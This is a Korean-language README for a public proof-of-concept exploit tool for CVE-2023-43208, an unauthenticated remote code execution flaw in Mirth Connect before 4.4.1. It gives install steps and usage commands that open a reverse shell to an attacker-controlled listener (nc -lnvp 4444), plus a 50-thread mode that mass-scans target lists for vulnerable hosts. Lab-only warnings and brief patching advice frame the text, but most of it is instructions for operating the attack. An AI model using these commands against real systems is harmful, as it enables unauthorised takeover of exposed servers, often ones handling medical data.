
CVE-2023-43208에 대한 개념 증명 익스플로잇으로, Mirth Connect 4.4.1 이전 버전에 존재하는 원격 코드 실행 취약점입니다.
⚠️ 교육 및 실험실 사용 전용 ⚠️
CVE-2023-43208에 대한 개념 증명(PoC) 익스플로잇으로, 버전 4.4.1 이전의 Mirth Connect에서 발생하는 원격 코드 실행 취약점입니다.
이 도구는 다음 용도로만 엄격히 사용해야 합니다:
다음 용도로는 사용하지 마세요:
모든 관련 법률 및 규정을 준수할 책임은 사용자에게 있습니다. 이 도구를 오용할 경우 형사 처벌을 받을 수 있습니다.
이 익스플로잇은 Mirth Connect의 /api/users 엔드포인트의 XML 역직렬화 취약점을 대상으로 하며, 영향을 받는 버전(< 4.4.1)에서 인증 없이 원격 코드 실행을 허용합니다.
이 취약점은 CRITICAL 등급이며, 반드시 격리된 실험실 환경에서 자신의 시스템으로만 테스트해야 합니다.
requirements.txt에 명시된 필수 패키지git clone https://github.com/M0h4/CVE-2023-43208-EXPLOIT.git cd CVE-2023-43208-EXPLOIT
pip install -r requirements.txt 💻 사용법 (실험실 전용)
대화형 모드 (실험실 권장) bash python exploit.py 명령줄 모드 bash
python exploit.py -u https://target:8443 -lh 10.10.14.5 -lp 4444
python exploit.py -f targets.txt -t 50 -o vulnerable.txt
python exploit.py -u https://target:8443 -lh 10.10.14.5 -lp 4444 --no-interactive 옵션 text -u, --url Target URL to exploit (LAB USE ONLY) -lh, --lhost Listening host (your IP) -lp, --lport Listening port -f, --file File containing target URLs to scan -o, --output Output file for saving scan results -t, --threads Number of threads for scanning (default: 50) --no-interactive Run in non-interactive mode 🎯 실험실 환경 예시
실험실을 설정하세요:
리스너를 시작하세요:
ncat -lnvp 4444
nc -lnvp 4444 실험실에서 익스플로잇을 실행하세요:
python exploit.py -u https://192.168.1.100:8443 -lh 192.168.1.50 -lp 4444 🧪 테스트 환경 요구 사항
📝 기술 세부 사항
취약점 유형: XML 역직렬화 RCE
영향을 받는 버전: Mirth Connect < 4.4.1
수정 버전: 4.4.1 이상
CVSS 점수: 9.8 (Critical)
공격 경로: 네트워크
인증: 필요 없음
이 익스플로잇은 Commons Collections 가젯을 사용하여 /api/users 엔드포인트를 통해 RCE를 달성합니다.
🛡️ 보호 조치
Mirth Connect를 실행 중인 경우:
✅ 버전 4.4.1 이상으로 업데이트
✅ 관리 인터페이스에 대한 네트워크 액세스 제한
✅ 적절한 인증 구현
✅ 의심스러운 XML 페이로드 모니터링
👥 크레딧
원저자: K3ysTr0K3R & Chocapikk
수정: M0h4
CVE: CVE-2023-43208
⚠️ 최종 경고
╔══════════════════════════════════════════════════════════════╗ ║ 이 도구는 실험실 전용입니다 ║ ║ 무단 사용은 불법이며 비윤리적입니다 ║ ║ 모든 위험과 책임은 사용자에게 있습니다 ║ ║ 저자는 오용에 대한 책임을 지지 않습니다 ║ ╚══════════════════════════════════════════════════════════════╝